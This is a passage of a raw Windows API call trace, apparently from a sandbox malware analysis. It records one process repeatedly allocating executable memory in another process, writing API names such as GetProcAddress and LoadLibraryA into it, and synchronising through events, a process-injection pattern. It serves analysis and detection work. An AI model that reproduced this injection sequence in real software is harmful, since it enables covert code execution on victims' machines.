lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.633] ResetEvent (hEvent=0x580) returned 1 [0176.633] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.633] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.633] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.633] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ccc0 | out: hHeap=0x2150000) returned 1 [0176.633] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.634] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.634] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.634] lstrlenA (lpString="GetTickCount") returned 12 [0176.634] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.634] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326fa086*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326fa086*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0176.635] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.635] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0176.635] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.636] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c870*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c870*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.636] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.637] ResetEvent (hEvent=0x580) returned 1 [0176.637] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.637] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.637] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.637] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0176.637] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.638] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.638] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.638] lstrlenA (lpString="GetConsoleCP") returned 12 [0176.638] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.638] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326fa446*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326fa446*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0176.640] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.640] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c3f0 [0176.640] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.640] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c3f0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c3f0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.641] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.641] ResetEvent (hEvent=0x580) returned 1 [0176.641] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.641] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.641] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.641] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c3f0 | out: hHeap=0x2150000) returned 1 [0176.642] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.642] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.642] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.642] lstrlenA (lpString="SetStdHandle") returned 12 [0176.642] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.642] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326fa436*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326fa436*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0176.644] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.644] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c690 [0176.644] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.644] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c690*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c690*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.645] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.645] ResetEvent (hEvent=0x580) returned 1 [0176.645] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.646] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.646] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.646] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c690 | out: hHeap=0x2150000) returned 1 [0176.646] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.646] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.646] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.646] lstrlenA (lpString="GetStringTypeW") returned 14 [0176.646] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.647] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326fa424*, nSize=0xf, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326fa424*, lpNumberOfBytesWritten=0xcd978*=0xf) returned 1 [0176.648] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.648] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ce70 [0176.649] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.649] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6ce70*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6ce70*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.649] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.650] ResetEvent (hEvent=0x580) returned 1 [0176.650] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.650] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.650] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.650] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ce70 | out: hHeap=0x2150000) returned 1 [0176.650] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.651] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.651] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.651] lstrlenA (lpString="GetFileType") returned 11 [0176.651] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.651] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326fa416*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326fa416*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0176.653] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.653] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c660 [0176.653] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.653] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c660*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c660*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.654] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.654] ResetEvent (hEvent=0x580) returned 1 [0176.654] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.654] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.655] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.655] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c660 | out: hHeap=0x2150000) returned 1 [0176.655] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.655] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.655] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.655] lstrlenA (lpString="GetStdHandle") returned 12 [0176.655] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.656] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326fa406*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326fa406*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0176.657] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.657] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cc90 [0176.657] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.657] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cc90*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cc90*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.658] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.658] ResetEvent (hEvent=0x580) returned 1 [0176.658] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.658] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.658] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.659] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cc90 | out: hHeap=0x2150000) returned 1 [0176.659] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.659] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.659] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.659] lstrlenA (lpString="GetProcAddress") returned 14 [0176.659] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.659] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9bba*, nSize=0xf, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9bba*, lpNumberOfBytesWritten=0xcd978*=0xf) returned 1 [0176.660] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.660] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ce70 [0176.660] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.661] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6ce70*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6ce70*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.661] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.662] ResetEvent (hEvent=0x580) returned 1 [0176.662] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.662] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.662] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.662] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ce70 | out: hHeap=0x2150000) returned 1 [0176.662] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.662] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.663] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.663] lstrlenA (lpString="LoadLibraryA") returned 12 [0176.663] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.663] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9baa*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9baa*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0176.664] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.664] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cae0 [0176.664] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.664] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cae0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cae0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.664] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.666] ResetEvent (hEvent=0x580) returned 1 [0176.666] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.666] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.666] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.666] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cae0 | out: hHeap=0x2150000) returned 1 [0176.666] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.667] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.667] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.667] lstrlenA (lpString="AddVectoredExceptionHandler") returned 27 [0176.667] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.667] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9b8c*, nSize=0x1c, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9b8c*, lpNumberOfBytesWritten=0xcd978*=0x1c) returned 1 [0176.668] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.668] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ca20 [0176.669] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.669] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6ca20*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6ca20*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.669] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.670] ResetEvent (hEvent=0x580) returned 1 [0176.670] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.670] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.670] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.670] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ca20 | out: hHeap=0x2150000) returned 1 [0176.670] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.671] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.671] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.671] lstrlenA (lpString="Sleep") returned 5 [0176.671] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.672] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.672] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cb40 [0176.673] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.673] ResetEvent (hEvent=0x580) returned 1 [0176.673] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.673] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.674] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.674] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cb40 | out: hHeap=0x2150000) returned 1 [0176.674] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.675] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.675] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.675] lstrlenA (lpString="GetConsoleMode") returned 14 [0176.675] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.676] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.676] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c8d0 [0176.676] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.676] ResetEvent (hEvent=0x580) returned 1 [0176.676] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.677] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.677] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.677] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c8d0 | out: hHeap=0x2150000) returned 1 [0176.677] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.678] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.678] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.678] lstrlenA (lpString="GetModuleHandleA") returned 16 [0176.678] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.679] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.679] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c360 [0176.679] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.680] ResetEvent (hEvent=0x580) returned 1 [0176.680] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.680] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.680] 